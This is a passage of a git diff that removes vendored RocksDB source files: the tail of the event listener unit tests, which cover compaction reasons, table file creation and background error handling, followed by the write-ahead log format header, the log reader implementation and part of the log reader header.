-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-
-  TestCompactionReasonListener* listener = new TestCompactionReasonListener();
-  options.listeners.emplace_back(listener);
-
-  options.level0_file_num_compaction_trigger = 4;
-  options.compaction_style = kCompactionStyleLevel;
-
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  // Write 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(listener->compaction_reasons_.size(), 1);
-  ASSERT_EQ(listener->compaction_reasons_[0],
-            CompactionReason::kLevelL0FilesNum);
-
-  DestroyAndReopen(options);
-
-  // Write 3 non-overlapping files in L0
-  for (int k = 1; k <= 30; k++) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-    if (k % 10 == 0) {
-      Flush();
-    }
-  }
-
-  // Do a trivial move from L0 -> L1
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  options.max_bytes_for_level_base = 1;
-  Close();
-  listener->compaction_reasons_.clear();
-  Reopen(options);
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_GT(listener->compaction_reasons_.size(), 1);
-
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kLevelMaxLevelSize);
-  }
-
-  options.disable_auto_compactions = true;
-  Close();
-  listener->compaction_reasons_.clear();
-  Reopen(options);
-
-  Put("key", "value");
-  CompactRangeOptions cro;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(cro, nullptr, nullptr));
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kManualCompaction);
-  }
-}
-
-TEST_F(EventListenerTest, CompactionReasonUniversal) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-
-  TestCompactionReasonListener* listener = new TestCompactionReasonListener();
-  options.listeners.emplace_back(listener);
-
-  options.compaction_style = kCompactionStyleUniversal;
-
-  Random rnd(301);
-
-  options.level0_file_num_compaction_trigger = 8;
-  options.compaction_options_universal.max_size_amplification_percent = 100000;
-  options.compaction_options_universal.size_ratio = 100000;
-  DestroyAndReopen(options);
-  listener->compaction_reasons_.clear();
-
-  // Write 8 files in L0
-  for (int i = 0; i < 8; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kUniversalSortedRunNum);
-  }
-
-  options.level0_file_num_compaction_trigger = 8;
-  options.compaction_options_universal.max_size_amplification_percent = 1;
-  options.compaction_options_universal.size_ratio = 100000;
-
-  DestroyAndReopen(options);
-  listener->compaction_reasons_.clear();
-
-  // Write 8 files in L0
-  for (int i = 0; i < 8; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kUniversalSizeAmplification);
-  }
-
-  options.disable_auto_compactions = true;
-  Close();
-  listener->compaction_reasons_.clear();
-  Reopen(options);
-
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kManualCompaction);
-  }
-}
-
-TEST_F(EventListenerTest, CompactionReasonFIFO) {
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(DBTestBase::kNumKeysByGenerateNewRandomFile));
-
-  TestCompactionReasonListener* listener = new TestCompactionReasonListener();
-  options.listeners.emplace_back(listener);
-
-  options.level0_file_num_compaction_trigger = 4;
-  options.compaction_style = kCompactionStyleFIFO;
-  options.compaction_options_fifo.max_table_files_size = 1;
-
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  // Write 4 files in L0
-  for (int i = 0; i < 4; i++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(listener->compaction_reasons_.size(), 0);
-  for (auto compaction_reason : listener->compaction_reasons_) {
-    ASSERT_EQ(compaction_reason, CompactionReason::kFIFOMaxSize);
-  }
-}
-
-class TableFileCreationListener : public EventListener {
- public:
-  class TestEnv : public EnvWrapper {
-   public:
-    TestEnv() : EnvWrapper(Env::Default()) {}
-
-    void SetStatus(Status s) { status_ = s; }
-
-    Status NewWritableFile(const std::string& fname,
-                           std::unique_ptr<WritableFile>* result,
-                           const EnvOptions& options) {
-      if (fname.size() > 4 && fname.substr(fname.size() - 4) == ".sst") {
-        if (!status_.ok()) {
-          return status_;
-        }
-      }
-      return Env::Default()->NewWritableFile(fname, result, options);
-    }
-
-   private:
-    Status status_;
-  };
-
-  TableFileCreationListener() {
-    for (int i = 0; i < 2; i++) {
-      started_[i] = finished_[i] = failure_[i] = 0;
-    }
-  }
-
-  int Index(TableFileCreationReason reason) {
-    int idx;
-    switch (reason) {
-      case TableFileCreationReason::kFlush:
-        idx = 0;
-        break;
-      case TableFileCreationReason::kCompaction:
-        idx = 1;
-        break;
-      default:
-        idx = -1;
-    }
-    return idx;
-  }
-
-  void CheckAndResetCounters(int flush_started, int flush_finished,
-                             int flush_failure, int compaction_started,
-                             int compaction_finished, int compaction_failure) {
-    ASSERT_EQ(started_[0], flush_started);
-    ASSERT_EQ(finished_[0], flush_finished);
-    ASSERT_EQ(failure_[0], flush_failure);
-    ASSERT_EQ(started_[1], compaction_started);
-    ASSERT_EQ(finished_[1], compaction_finished);
-    ASSERT_EQ(failure_[1], compaction_failure);
-    for (int i = 0; i < 2; i++) {
-      started_[i] = finished_[i] = failure_[i] = 0;
-    }
-  }
-
-  void OnTableFileCreationStarted(
-      const TableFileCreationBriefInfo& info) override {
-    int idx = Index(info.reason);
-    if (idx >= 0) {
-      started_[idx]++;
-    }
-    ASSERT_GT(info.db_name.size(), 0U);
-    ASSERT_GT(info.cf_name.size(), 0U);
-    ASSERT_GT(info.file_path.size(), 0U);
-    ASSERT_GT(info.job_id, 0);
-  }
-
-  void OnTableFileCreated(const TableFileCreationInfo& info) override {
-    int idx = Index(info.reason);
-    if (idx >= 0) {
-      finished_[idx]++;
-    }
-    ASSERT_GT(info.db_name.size(), 0U);
-    ASSERT_GT(info.cf_name.size(), 0U);
-    ASSERT_GT(info.file_path.size(), 0U);
-    ASSERT_GT(info.job_id, 0);
-    if (info.status.ok()) {
-      ASSERT_GT(info.table_properties.data_size, 0U);
-      ASSERT_GT(info.table_properties.raw_key_size, 0U);
-      ASSERT_GT(info.table_properties.raw_value_size, 0U);
-      ASSERT_GT(info.table_properties.num_data_blocks, 0U);
-      ASSERT_GT(info.table_properties.num_entries, 0U);
-    } else {
-      if (idx >= 0) {
-        failure_[idx]++;
-      }
-    }
-  }
-
-  TestEnv test_env;
-  int started_[2];
-  int finished_[2];
-  int failure_[2];
-};
-
-TEST_F(EventListenerTest, TableFileCreationListenersTest) {
-  auto listener = std::make_shared<TableFileCreationListener>();
-  Options options;
-  options.create_if_missing = true;
-  options.listeners.push_back(listener);
-  options.env = &listener->test_env;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("foo", "aaa"));
-  ASSERT_OK(Put("bar", "bbb"));
-  ASSERT_OK(Flush());
-  dbfull()->TEST_WaitForFlushMemTable();
-  listener->CheckAndResetCounters(1, 1, 0, 0, 0, 0);
-
-  ASSERT_OK(Put("foo", "aaa1"));
-  ASSERT_OK(Put("bar", "bbb1"));
-  listener->test_env.SetStatus(Status::NotSupported("not supported"));
-  ASSERT_NOK(Flush());
-  listener->CheckAndResetCounters(1, 1, 1, 0, 0, 0);
-  listener->test_env.SetStatus(Status::OK());
-
-  Reopen(options);
-  ASSERT_OK(Put("foo", "aaa2"));
-  ASSERT_OK(Put("bar", "bbb2"));
-  ASSERT_OK(Flush());
-  dbfull()->TEST_WaitForFlushMemTable();
-  listener->CheckAndResetCounters(1, 1, 0, 0, 0, 0);
-
-  const Slice kRangeStart = "a";
-  const Slice kRangeEnd = "z";
-  dbfull()->CompactRange(CompactRangeOptions(), &kRangeStart, &kRangeEnd);
-  dbfull()->TEST_WaitForCompact();
-  listener->CheckAndResetCounters(0, 0, 0, 1, 1, 0);
-
-  ASSERT_OK(Put("foo", "aaa3"));
-  ASSERT_OK(Put("bar", "bbb3"));
-  ASSERT_OK(Flush());
-  listener->test_env.SetStatus(Status::NotSupported("not supported"));
-  dbfull()->CompactRange(CompactRangeOptions(), &kRangeStart, &kRangeEnd);
-  dbfull()->TEST_WaitForCompact();
-  listener->CheckAndResetCounters(1, 1, 0, 1, 1, 1);
-}
-
-class MemTableSealedListener : public EventListener {
-private:
-  SequenceNumber latest_seq_number_;
-public:
-  MemTableSealedListener() {}
-  void OnMemTableSealed(const MemTableInfo& info) override {
-    latest_seq_number_ = info.first_seqno;
-  }
-
-  void OnFlushCompleted(DB* /*db*/,
-    const FlushJobInfo& flush_job_info) override {
-    ASSERT_LE(flush_job_info.smallest_seqno, latest_seq_number_);
-  }
-};
-
-TEST_F(EventListenerTest, MemTableSealedListenerTest) {
-  auto listener = std::make_shared<MemTableSealedListener>();
-  Options options;
-  options.create_if_missing = true;
-  options.listeners.push_back(listener);
-  DestroyAndReopen(options);
-
-  for (unsigned int i = 0; i < 10; i++) {
-    std::string tag = std::to_string(i);
-    ASSERT_OK(Put("foo"+tag, "aaa"));
-    ASSERT_OK(Put("bar"+tag, "bbb"));
-
-    ASSERT_OK(Flush());
-  }
-}
-
-class ColumnFamilyHandleDeletionStartedListener : public EventListener {
- private:
-  std::vector<std::string> cfs_;
-  int counter;
-
- public:
-  explicit ColumnFamilyHandleDeletionStartedListener(
-      const std::vector<std::string>& cfs)
-      : cfs_(cfs), counter(0) {
-    cfs_.insert(cfs_.begin(), kDefaultColumnFamilyName);
-  }
-  void OnColumnFamilyHandleDeletionStarted(
-      ColumnFamilyHandle* handle) override {
-    ASSERT_EQ(cfs_[handle->GetID()], handle->GetName());
-    counter++;
-  }
-  int getCounter() { return counter; }
-};
-
-TEST_F(EventListenerTest, ColumnFamilyHandleDeletionStartedListenerTest) {
-  std::vector<std::string> cfs{"pikachu", "eevee", "Mewtwo"};
-  auto listener =
-      std::make_shared<ColumnFamilyHandleDeletionStartedListener>(cfs);
-  Options options;
-  options.env = CurrentOptions().env;
-  options.create_if_missing = true;
-  options.listeners.push_back(listener);
-  CreateAndReopenWithCF(cfs, options);
-  ASSERT_EQ(handles_.size(), 4);
-  delete handles_[3];
-  delete handles_[2];
-  delete handles_[1];
-  handles_.resize(1);
-  ASSERT_EQ(listener->getCounter(), 3);
-}
-
-class BackgroundErrorListener : public EventListener {
- private:
-  SpecialEnv* env_;
-  int counter_;
-
- public:
-  BackgroundErrorListener(SpecialEnv* env) : env_(env), counter_(0) {}
-
-  void OnBackgroundError(BackgroundErrorReason reason, Status* bg_error) override {
-    if (counter_ == 0) {
-      // suppress the first error and disable write-dropping such that a retry
-      // can succeed.
-      *bg_error = Status::OK();
-      env_->drop_writes_.store(false, std::memory_order_release);
-      env_->no_slowdown_ = false;
-    }
-    ++counter_;
-  }
-
-  int counter() { return counter_; }
-};
-
-TEST_F(EventListenerTest, BackgroundErrorListenerFailedFlushTest) {
-  auto listener = std::make_shared<BackgroundErrorListener>(env_);
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  options.listeners.push_back(listener);
-  options.memtable_factory.reset(new SpecialSkipListFactory(1));
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-
-  // the usual TEST_WaitForFlushMemTable() doesn't work for failed flushes, so
-  // forge a custom one for the failed flush case.
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BGWorkFlush:done",
-        "EventListenerTest:BackgroundErrorListenerFailedFlushTest:1"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  env_->drop_writes_.store(true, std::memory_order_release);
-  env_->no_slowdown_ = true;
-
-  ASSERT_OK(Put("key0", "val"));
-  ASSERT_OK(Put("key1", "val"));
-  TEST_SYNC_POINT("EventListenerTest:BackgroundErrorListenerFailedFlushTest:1");
-  ASSERT_EQ(1, listener->counter());
-  ASSERT_OK(Put("key2", "val"));
-  ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-}
-
-TEST_F(EventListenerTest, BackgroundErrorListenerFailedCompactionTest) {
-  auto listener = std::make_shared<BackgroundErrorListener>(env_);
-  Options options;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.env = env_;
-  options.level0_file_num_compaction_trigger = 2;
-  options.listeners.push_back(listener);
-  options.memtable_factory.reset(new SpecialSkipListFactory(2));
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-
-  // third iteration triggers the second memtable's flush
-  for (int i = 0; i < 3; ++i) {
-    ASSERT_OK(Put("key0", "val"));
-    if (i > 0) {
-      ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-    }
-    ASSERT_OK(Put("key1", "val"));
-  }
-  ASSERT_EQ(2, NumTableFilesAtLevel(0));
-
-  env_->drop_writes_.store(true, std::memory_order_release);
-  env_->no_slowdown_ = true;
-  ASSERT_OK(dbfull()->SetOptions({{"disable_auto_compactions", "false"}}));
-  ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  ASSERT_EQ(1, listener->counter());
-
-  // trigger flush so compaction is triggered again; this time it succeeds
-  ASSERT_OK(Put("key0", "val"));
-  ASSERT_OK(dbfull()->TEST_WaitForFlushMemTable());
-  ASSERT_OK(dbfull()->TEST_WaitForCompact());
-  ASSERT_EQ(0, NumTableFilesAtLevel(0));
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/log_format.h b/thirdparty/rocksdb/db/log_format.h
deleted file mode 100644
index be22201..0000000
--- a/thirdparty/rocksdb/db/log_format.h
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Log format information shared by reader and writer.
-// See ../doc/log_format.txt for more detail.
-
-#pragma once
-namespace rocksdb {
-namespace log {
-
-enum RecordType {
-  // Zero is reserved for preallocated files
-  kZeroType = 0,
-  kFullType = 1,
-
-  // For fragments
-  kFirstType = 2,
-  kMiddleType = 3,
-  kLastType = 4,
-
-  // For recycled log files
-  kRecyclableFullType = 5,
-  kRecyclableFirstType = 6,
-  kRecyclableMiddleType = 7,
-  kRecyclableLastType = 8,
-};
-static const int kMaxRecordType = kRecyclableLastType;
-
-static const unsigned int kBlockSize = 32768;
-
-// Header is checksum (4 bytes), length (2 bytes), type (1 byte)
-static const int kHeaderSize = 4 + 2 + 1;
-
-// Recyclable header is checksum (4 bytes), type (1 byte), log number
-// (4 bytes), length (2 bytes).
-static const int kRecyclableHeaderSize = 4 + 1 + 4 + 2;
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_reader.cc b/thirdparty/rocksdb/db/log_reader.cc
deleted file mode 100644
index cae5d8e..0000000
--- a/thirdparty/rocksdb/db/log_reader.cc
+++ /dev/null
@@ -1,432 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/log_reader.h"
-
-#include <stdio.h>
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace log {
-
-Reader::Reporter::~Reporter() {
-}
-
-Reader::Reader(std::shared_ptr<Logger> info_log,
-               unique_ptr<SequentialFileReader>&& _file, Reporter* reporter,
-               bool checksum, uint64_t initial_offset, uint64_t log_num)
-    : info_log_(info_log),
-      file_(std::move(_file)),
-      reporter_(reporter),
-      checksum_(checksum),
-      backing_store_(new char[kBlockSize]),
-      buffer_(),
-      eof_(false),
-      read_error_(false),
-      eof_offset_(0),
-      last_record_offset_(0),
-      end_of_buffer_offset_(0),
-      initial_offset_(initial_offset),
-      log_number_(log_num),
-      recycled_(false) {}
-
-Reader::~Reader() {
-  delete[] backing_store_;
-}
-
-bool Reader::SkipToInitialBlock() {
-  size_t initial_offset_in_block = initial_offset_ % kBlockSize;
-  uint64_t block_start_location = initial_offset_ - initial_offset_in_block;
-
-  // Don't search a block if we'd be in the trailer
-  if (initial_offset_in_block > kBlockSize - 6) {
-    block_start_location += kBlockSize;
-  }
-
-  end_of_buffer_offset_ = block_start_location;
-
-  // Skip to start of first block that can contain the initial record
-  if (block_start_location > 0) {
-    Status skip_status = file_->Skip(block_start_location);
-    if (!skip_status.ok()) {
-      ReportDrop(static_cast<size_t>(block_start_location), skip_status);
-      return false;
-    }
-  }
-
-  return true;
-}
-
-// For kAbsoluteConsistency, on clean shutdown we don't expect any error
-// in the log files.  For other modes, we can ignore only incomplete records
-// in the last log file, which are presumably due to a write in progress
-// during restart (or from log recycling).
-//
-// TODO krad: Evaluate if we need to move to a more strict mode where we
-// restrict the inconsistency to only the last log
-bool Reader::ReadRecord(Slice* record, std::string* scratch,
-                        WALRecoveryMode wal_recovery_mode) {
-  if (last_record_offset_ < initial_offset_) {
-    if (!SkipToInitialBlock()) {
-      return false;
-    }
-  }
-
-  scratch->clear();
-  record->clear();
-  bool in_fragmented_record = false;
-  // Record offset of the logical record that we're reading
-  // 0 is a dummy value to make compilers happy
-  uint64_t prospective_record_offset = 0;
-
-  Slice fragment;
-  while (true) {
-    uint64_t physical_record_offset = end_of_buffer_offset_ - buffer_.size();
-    size_t drop_size = 0;
-    const unsigned int record_type = ReadPhysicalRecord(&fragment, &drop_size);
-    switch (record_type) {
-      case kFullType:
-      case kRecyclableFullType:
-        if (in_fragmented_record && !scratch->empty()) {
-          // Handle bug in earlier versions of log::Writer where
-          // it could emit an empty kFirstType record at the tail end
-          // of a block followed by a kFullType or kFirstType record
-          // at the beginning of the next block.
-          ReportCorruption(scratch->size(), "partial record without end(1)");
-        }
-        prospective_record_offset = physical_record_offset;
-        scratch->clear();
-        *record = fragment;
-        last_record_offset_ = prospective_record_offset;
-        return true;
-
-      case kFirstType:
-      case kRecyclableFirstType:
-        if (in_fragmented_record && !scratch->empty()) {
-          // Handle bug in earlier versions of log::Writer where
-          // it could emit an empty kFirstType record at the tail end
-          // of a block followed by a kFullType or kFirstType record
-          // at the beginning of the next block.
-          ReportCorruption(scratch->size(), "partial record without end(2)");
-        }
-        prospective_record_offset = physical_record_offset;
-        scratch->assign(fragment.data(), fragment.size());
-        in_fragmented_record = true;
-        break;
-
-      case kMiddleType:
-      case kRecyclableMiddleType:
-        if (!in_fragmented_record) {
-          ReportCorruption(fragment.size(),
-                           "missing start of fragmented record(1)");
-        } else {
-          scratch->append(fragment.data(), fragment.size());
-        }
-        break;
-
-      case kLastType:
-      case kRecyclableLastType:
-        if (!in_fragmented_record) {
-          ReportCorruption(fragment.size(),
-                           "missing start of fragmented record(2)");
-        } else {
-          scratch->append(fragment.data(), fragment.size());
-          *record = Slice(*scratch);
-          last_record_offset_ = prospective_record_offset;
-          return true;
-        }
-        break;
-
-      case kBadHeader:
-        if (wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency) {
-          // in clean shutdown we don't expect any error in the log files
-          ReportCorruption(drop_size, "truncated header");
-        }
-      // fall-thru
-
-      case kEof:
-        if (in_fragmented_record) {
-          if (wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency) {
-            // in clean shutdown we don't expect any error in the log files
-            ReportCorruption(scratch->size(), "error reading trailing data");
-          }
-          // This can be caused by the writer dying immediately after
-          //  writing a physical record but before completing the next; don't
-          //  treat it as a corruption, just ignore the entire logical record.
-          scratch->clear();
-        }
-        return false;
-
-      case kOldRecord:
-        if (wal_recovery_mode != WALRecoveryMode::kSkipAnyCorruptedRecords) {
-          // Treat a record from a previous instance of the log as EOF.
-          if (in_fragmented_record) {
-            if (wal_recovery_mode == WALRecoveryMode::kAbsoluteConsistency) {
-              // in clean shutdown we don't expect any error in the log files
-              ReportCorruption(scratch->size(), "error reading trailing data");
-            }
-            // This can be caused by the writer dying immediately after
-            //  writing a physical record but before completing the next; don't
-            //  treat it as a corruption, just ignore the entire logical record.
-            scratch->clear();
-          }
-          return false;
-        }
-      // fall-thru
-
-      case kBadRecord:
-        if (in_fragmented_record) {
-          ReportCorruption(scratch->size(), "error in middle of record");
-          in_fragmented_record = false;
-          scratch->clear();
-        }
-        break;
-
-      case kBadRecordLen:
-      case kBadRecordChecksum:
-        if (recycled_ &&
-            wal_recovery_mode ==
-                WALRecoveryMode::kTolerateCorruptedTailRecords) {
-          scratch->clear();
-          return false;
-        }
-        if (record_type == kBadRecordLen) {
-          ReportCorruption(drop_size, "bad record length");
-        } else {
-          ReportCorruption(drop_size, "checksum mismatch");
-        }
-        if (in_fragmented_record) {
-          ReportCorruption(scratch->size(), "error in middle of record");
-          in_fragmented_record = false;
-          scratch->clear();
-        }
-        break;
-
-      default: {
-        char buf[40];
-        snprintf(buf, sizeof(buf), "unknown record type %u", record_type);
-        ReportCorruption(
-            (fragment.size() + (in_fragmented_record ? scratch->size() : 0)),
-            buf);
-        in_fragmented_record = false;
-        scratch->clear();
-        break;
-      }
-    }
-  }
-  return false;
-}
-
-uint64_t Reader::LastRecordOffset() {
-  return last_record_offset_;
-}
-
-void Reader::UnmarkEOF() {
-  if (read_error_) {
-    return;
-  }
-
-  eof_ = false;
-
-  if (eof_offset_ == 0) {
-    return;
-  }
-
-  // If the EOF was in the middle of a block (a partial block was read) we have
-  // to read the rest of the block as ReadPhysicalRecord can only read full
-  // blocks and expects the file position indicator to be aligned to the start
-  // of a block.
-  //
-  //      consumed_bytes + buffer_size() + remaining == kBlockSize
-
-  size_t consumed_bytes = eof_offset_ - buffer_.size();
-  size_t remaining = kBlockSize - eof_offset_;
-
-  // backing_store_ is used to concatenate what is left in buffer_ and
-  // the remainder of the block. If buffer_ already uses backing_store_,
-  // we just append the new data.
-  if (buffer_.data() != backing_store_ + consumed_bytes) {
-    // Buffer_ does not use backing_store_ for storage.
-    // Copy what is left in buffer_ to backing_store.
-    memmove(backing_store_ + consumed_bytes, buffer_.data(), buffer_.size());
-  }
-
-  Slice read_buffer;
-  Status status = file_->Read(remaining, &read_buffer,
-    backing_store_ + eof_offset_);
-
-  size_t added = read_buffer.size();
-  end_of_buffer_offset_ += added;
-
-  if (!status.ok()) {
-    if (added > 0) {
-      ReportDrop(added, status);
-    }
-
-    read_error_ = true;
-    return;
-  }
-
-  if (read_buffer.data() != backing_store_ + eof_offset_) {
-    // Read did not write to backing_store_
-    memmove(backing_store_ + eof_offset_, read_buffer.data(),
-      read_buffer.size());
-  }
-
-  buffer_ = Slice(backing_store_ + consumed_bytes,
-    eof_offset_ + added - consumed_bytes);
-
-  if (added < remaining) {
-    eof_ = true;
-    eof_offset_ += added;
-  } else {
-    eof_offset_ = 0;
-  }
-}
-
-void Reader::ReportCorruption(size_t bytes, const char* reason) {
-  ReportDrop(bytes, Status::Corruption(reason));
-}
-
-void Reader::ReportDrop(size_t bytes, const Status& reason) {
-  if (reporter_ != nullptr &&
-      end_of_buffer_offset_ - buffer_.size() - bytes >= initial_offset_) {
-    reporter_->Corruption(bytes, reason);
-  }
-}
-
-bool Reader::ReadMore(size_t* drop_size, int *error) {
-  if (!eof_ && !read_error_) {
-    // Last read was a full read, so this is a trailer to skip
-    buffer_.clear();
-    Status status = file_->Read(kBlockSize, &buffer_, backing_store_);
-    end_of_buffer_offset_ += buffer_.size();
-    if (!status.ok()) {
-      buffer_.clear();
-      ReportDrop(kBlockSize, status);
-      read_error_ = true;
-      *error = kEof;
-      return false;
-    } else if (buffer_.size() < (size_t)kBlockSize) {
-      eof_ = true;
-      eof_offset_ = buffer_.size();
-    }
-    return true;
-  } else {
-    // Note that if buffer_ is non-empty, we have a truncated header at the
-    //  end of the file, which can be caused by the writer crashing in the
-    //  middle of writing the header. Unless explicitly requested we don't
-    //  considering this an error, just report EOF.
-    if (buffer_.size()) {
-      *drop_size = buffer_.size();
-      buffer_.clear();
-      *error = kBadHeader;
-      return false;
-    }
-    buffer_.clear();
-    *error = kEof;
-    return false;
-  }
-}
-
-unsigned int Reader::ReadPhysicalRecord(Slice* result, size_t* drop_size) {
-  while (true) {
-    // We need at least the minimum header size
-    if (buffer_.size() < (size_t)kHeaderSize) {
-      int r;
-      if (!ReadMore(drop_size, &r)) {
-        return r;
-      }
-      continue;
-    }
-
-    // Parse the header
-    const char* header = buffer_.data();
-    const uint32_t a = static_cast<uint32_t>(header[4]) & 0xff;
-    const uint32_t b = static_cast<uint32_t>(header[5]) & 0xff;
-    const unsigned int type = header[6];
-    const uint32_t length = a | (b << 8);
-    int header_size = kHeaderSize;
-    if (type >= kRecyclableFullType && type <= kRecyclableLastType) {
-      if (end_of_buffer_offset_ - buffer_.size() == 0) {
-        recycled_ = true;
-      }
-      header_size = kRecyclableHeaderSize;
-      // We need enough for the larger header
-      if (buffer_.size() < (size_t)kRecyclableHeaderSize) {
-        int r;
-        if (!ReadMore(drop_size, &r)) {
-          return r;
-        }
-        continue;
-      }
-      const uint32_t log_num = DecodeFixed32(header + 7);
-      if (log_num != log_number_) {
-        return kOldRecord;
-      }
-    }
-    if (header_size + length > buffer_.size()) {
-      *drop_size = buffer_.size();
-      buffer_.clear();
-      if (!eof_) {
-        return kBadRecordLen;
-      }
-      // If the end of the file has been reached without reading |length| bytes
-      // of payload, assume the writer died in the middle of writing the record.
-      // Don't report a corruption unless requested.
-      if (*drop_size) {
-        return kBadHeader;
-      }
-      return kEof;
-    }
-
-    if (type == kZeroType && length == 0) {
-      // Skip zero length record without reporting any drops since
-      // such records are produced by the mmap based writing code in
-      // env_posix.cc that preallocates file regions.
-      // NOTE: this should never happen in DB written by new RocksDB versions,
-      // since we turn off mmap writes to manifest and log files
-      buffer_.clear();
-      return kBadRecord;
-    }
-
-    // Check crc
-    if (checksum_) {
-      uint32_t expected_crc = crc32c::Unmask(DecodeFixed32(header));
-      uint32_t actual_crc = crc32c::Value(header + 6, length + header_size - 6);
-      if (actual_crc != expected_crc) {
-        // Drop the rest of the buffer since "length" itself may have
-        // been corrupted and if we trust it, we could find some
-        // fragment of a real log record that just happens to look
-        // like a valid log record.
-        *drop_size = buffer_.size();
-        buffer_.clear();
-        return kBadRecordChecksum;
-      }
-    }
-
-    buffer_.remove_prefix(header_size + length);
-
-    // Skip physical record that started before initial_offset_
-    if (end_of_buffer_offset_ - buffer_.size() - header_size - length <
-        initial_offset_) {
-      result->clear();
-      return kBadRecord;
-    }
-
-    *result = Slice(header + header_size, length);
-    return type;
-  }
-}
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_reader.h b/thirdparty/rocksdb/db/log_reader.h
deleted file mode 100644
index c6a471c..0000000
--- a/thirdparty/rocksdb/db/log_reader.h
+++ /dev/null
@@ -1,160 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <memory>
-#include <stdint.h>
-
-#include "db/log_format.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-class SequentialFileReader;
-class Logger;
-using std::unique_ptr;
-
-namespace log {
-
-/**
- * Reader is a general purpose log stream reader implementation. The actual job
- * of reading from the device is implemented by the SequentialFile interface.
- *
- * Please see Writer for details on the file and record layout.
- */
-class Reader {
- public:
-  // Interface for reporting errors.
-  class Reporter {
-   public:
-    virtual ~Reporter();
-
-    // Some corruption was detected.  "size" is the approximate number
-    // of bytes dropped due to the corruption.
-    virtual void Corruption(size_t bytes, const Status& status) = 0;
-  };
-
-  // Create a reader that will return log records from "*file".
-  // "*file" must remain live while this Reader is in use.
-  //
-  // If "reporter" is non-nullptr, it is notified whenever some data is
-  // dropped due to a detected corruption.  "*reporter" must remain
-  // live while this Reader is in use.
-  //
-  // If "checksum" is true, verify checksums if available.
-  //
-  // The Reader will start reading at the first record located at physical
-  // position >= initial_offset within the file.
-  Reader(std::shared_ptr<Logger> info_log,
-	 unique_ptr<SequentialFileReader>&& file,
